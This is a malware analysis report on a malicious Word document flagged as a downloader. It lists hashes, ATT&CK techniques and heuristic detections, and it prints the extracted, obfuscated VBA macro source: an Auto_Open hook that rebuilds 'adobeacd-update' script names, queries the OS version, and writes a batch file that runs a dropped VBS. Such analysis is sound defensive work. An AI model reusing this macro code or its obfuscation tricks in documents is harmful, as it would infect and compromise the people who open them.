Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8b92c23b29422131…

MALICIOUS

Office (OLE)

62.5 KB Created: 2015-02-08 19:56:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: a3b613d128aace09241504e8acc678c2 SHA-1: edde71ccadfad1380b881da5ecafc77fba5885b8 SHA-256: 8b92c23b29422131acc150fa1ebac67e1b0b0f8cfc1b727805b842a88de447de
Risk Score: 430

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains multiple VBA auto-execution macros (AutoOpen, Workbook_Open, Auto_Open) that trigger the execution of a malicious script. This script utilizes the 'WScript.Shell' object, reassembled from split string literals, to construct paths for temporary files and likely download and execute a second-stage payload. The presence of 'Shell()' and 'GetObject()' calls further indicates malicious intent to execute external code.

Heuristics (12)

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15446 bytes
SHA-256: 4efb6e24b820e59e29788226f82e43e5a227bbcc68b813740771e21fdbdb739c
Script preview (first 1,000 lines of the extracted VBA source):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    h
End Sub
Sub h()
Dim MY_FILENDIR, ASDASDSA, MY_FILDIR, XPFILEDIR, JAISODJAS
     ds = 100
     USER = Environ$("" & Chr(Asc(Chr(ds + 17))) + "s" & "er" & "na" & "me")
     
     jks = ds
         
     PST2 = "" & "a" + "do" & "be" & "ac" & "d-u" & "pd" & "a" & "te" & ""
     VBT2 = "" & "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te" & ""
     VBTXP2 = "" & "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p" & ""
     BART2 = "" & "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date" & ""
    
     PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1"
     VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
     VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
     BART = BART2 + Chr(Abs(46)) + Chr(Abs(98)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(ds + 16))) + ""
     
     JSIQOJQ = BART2 + Chr(Abs(ds - 100 - 46)) + Chr(Abs(ds - 100 - 98)) + Chr(Asc(Chr(Abs(ds / 2 + 47)))) + Chr(Asc(Chr(ds + Fix(16.2)))) + "" & ""
          
     BART = JSIQOJQ
     MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1 + "" & ""
    
     ASDASDSA = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
     MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + ""
     XPFILEDIR = "c:\Windows\Temp\" + VBTXP
     TRT = "c:\Windows\Temp\" + BART
     KRT = TRT
     HYF = KRT
     NUWHDGJS = HYF
     JASHDUIQWHDKJQAD = ".44/upd/install"
     
      On Error Resume Next
     SetAttr MY_FILENDIR, vbNormal
     
     If (Len(Dir(MY_FILENDIR)) <> 0) Then
      Kill MY_FILENDIR
     End If
     
     On Error Resume Next
     SetAttr ASDASDSA, vbNormal
     If (Dir(ASDASDSA) <> "") Then
      Kill ASDASDSA
     End If
     
     On Error Resume Next
     SetAttr MY_FILDIR, vbNormal
     If (Dir(MY_FILDIR) <> "") Then
      Kill MY_FILDIR
     End If
     
     On Error Resume Next
     SetAttr XPFILEDIR, vbNormal
     If (Dir(XPFILEDIR) <> "") Then
      Kill XPFILEDIR
     End If
      
     Dim Uuwqdhj, FileNumber, FileNumb, FileNu, FileNuG, FileNs, mttt, jskw As Integer
    
     Dim retVal As Variant
     
     FileNumber = FreeFile
     FileNumb = FreeFile
     FileNu = FreeFile
     FileNukk = FreeFile
     
     FileNs = FreeFile
     Kasdwq = FreeFile
     FileNuG = FreeFile
     Dim objWMIService As Variant
    Dim colOperatingSystems As Variant
    Dim objOperatingSystem As Variant
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
    Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
    For Each objOperatingSystem In colOperatingSystems
        SysReport = SysReport & "The operating system on this computer is " & _
            objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
    Next
     
     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
     For Each objOperatingSystem In colOperatingSystems
        winverstr = objOperatingSystem.Version
    Next
    
    
    winver = Val(winverstr)
    WaitFor (1)
    jskw = winver
 
 If (jskw <= 5.5) Then
          
     Open NUWHDGJS For Output As #Kasdwq
     Print #Kasdwq, "@echo off"
     Print #Kasdwq, ":pinkator"
     Print #Kasdwq, "pin" + "g 1.3.1.2 -n" & " 2" + ""
     LKASHDUIQWHQUDKNBWQKJDHQ = "sakdj lksajds" + "sakdj sakjd sakhd jhqwiudhquid gughg"
     Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + ""
     Print #Kas
... (truncated)